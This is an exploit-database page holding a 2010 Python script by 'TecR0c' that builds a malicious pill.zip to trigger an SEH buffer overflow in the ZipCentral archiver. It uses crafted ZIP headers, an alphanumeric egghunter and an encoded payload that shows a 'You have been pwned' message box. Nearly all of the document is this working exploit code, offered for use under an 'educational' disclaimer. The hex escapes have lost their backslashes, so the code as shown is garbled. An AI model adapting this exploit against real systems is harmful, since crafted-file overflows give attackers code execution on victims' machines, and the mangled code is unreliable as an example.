[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ZipCentral (.zip) SEH Exploit
# Published : 2010-04-04
# Author : TecR0c
# Previous Title : PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
# Next Title : eZip Wizard 3.0 (.zip) SEH
#!/usr/bin/python
#
# Title: ZipCentral (.zip) SEH exploit
# Author: TecR0c - http://tecninja.net/blog & http://twitter.com/TecR0c
# Download: http://downloads.pcworld.com/pub/new/utilities/compression/zcsetup.exe
# Platform: Windows XP sp3 En (VMWARE)
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# Unfortunately, no one can be told what the Matrix is. You have to see it for yourself!
# To be able to make sure your hex values get mangled correctly i have created my own
# Mangled Chart: http://tecninja.net/blog/?p=35
# Discription of exploit: http://tecninja.net/blog/?p=73
# You can notice i have used this technique for my PPR and JMPs
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| security@corelan.be |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] pill (.zip) SEH exploit - by TecR0c"
ldf_header = ("x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00"
"xe4x0f"
"x00x00x00")
cdf_header = ("x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00x00"
"xe4x0f"
"x00x00x00x00x00x00x01x00"
"x24x00x00x00x00x00x00x00")
eofcdf_header = ("x50x4Bx05x06x00x00x00x00x01x00x01x00"
"x12x10x00x00"
"x02x10x00x00"
"x00x00")
#Limit of 50 bytes for the filename
#PASSWORDS
#filename = ("x50x41x53"
#"x53x57xeax52x44x53")
#ReadMe
filename = (
"x52x65x61x64x4dx65")
# ESI - Im going to enjoy watching you die Mr Anderson
egghunter = ("VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIBFmQzjk"
"OdOw2sb3ZUR68JmVNulUUQJSDJOx867Dpdp64nkKJNOpuKZNOT5JGYokWA")
# align ESI for msg - To deny our own impulses is to deny the very thing that makes us human
getpc = ("x89x05x5ex41x98x99x41x8ax94x98x98x98")
# EDI is chosen thanks to the egghunter - Never send a human to do a machines job
msg = ( # TITLE=Corelan TEXT="You have been pwned"
"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkOkJy4"
"4a4yd4qXRlr2Zp1HIpdNk2Q00lK2VVllKpvglnkg6THNksNUpLKVVWHPOfxRU"
"l3ryUQKakOXa50nkPlvDtdLKW5wLlKPTTEPxWqKZLK0J6xnk1JwPVahkM35g1"
"YlK7DLKVaXn6Q9o6QkpKLnLMTIP0tTJKq8O4Ms1iWm9hqyo9okOWKQlwTWXae"
"knnk0ZUtGqzK1vNk6l0KLKPZuLs1jKLK4Dnkc1m8NiQTwT7lu1O3oBTHGYn4O"
"y8eLIKrqxnnPNVnZL3bkXmLKOkOKOK9pETDOKqnKhM2qcmW5Lddcbm8NkKOIo"
"KOoyqU4H3XRLrLGPkOu8tsvR6NQte8QeQc0esBoxQLetwzOyKVF6Yo65vdmY9"
"RrpmklhoRPMmlowglut2rM8CnKOKO9oQxRLparNqH1xrcPobR2EEaKkmXQLTd"
"UWMY9saxBNsUu4shu8RNq0RPqgRHq0QrBE3UU80h3QPvQu58QIBOd5upvQO9m"
"XpLutvsK9YqfQN22r63SaaBio8PVQyPpP9oPUS8vjA")
buff = filename
buff += "x20" * (50-len(buff))
buff += "x57x30x30x54" # If you close your eyes, it almost feels like you're eating runny eggs
buff += "x57x30x30x54" # The trace was completed
buff += msg # Don't hate me Trinity... I'm just the messenger
buff += "x41" * (653-len(buff))
buff += "x89x06x42x42"
buff += "x56x29xa5x72" # Welcome to the desert of the real
buff += "x41" * 10
buff += getpc
buff += egghunter # The digital pimp hard at work
buff += "x42" * (4064-len(buff))
buff += ".txt"
mefile = open('pill.zip','w');
mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);
mefile.close()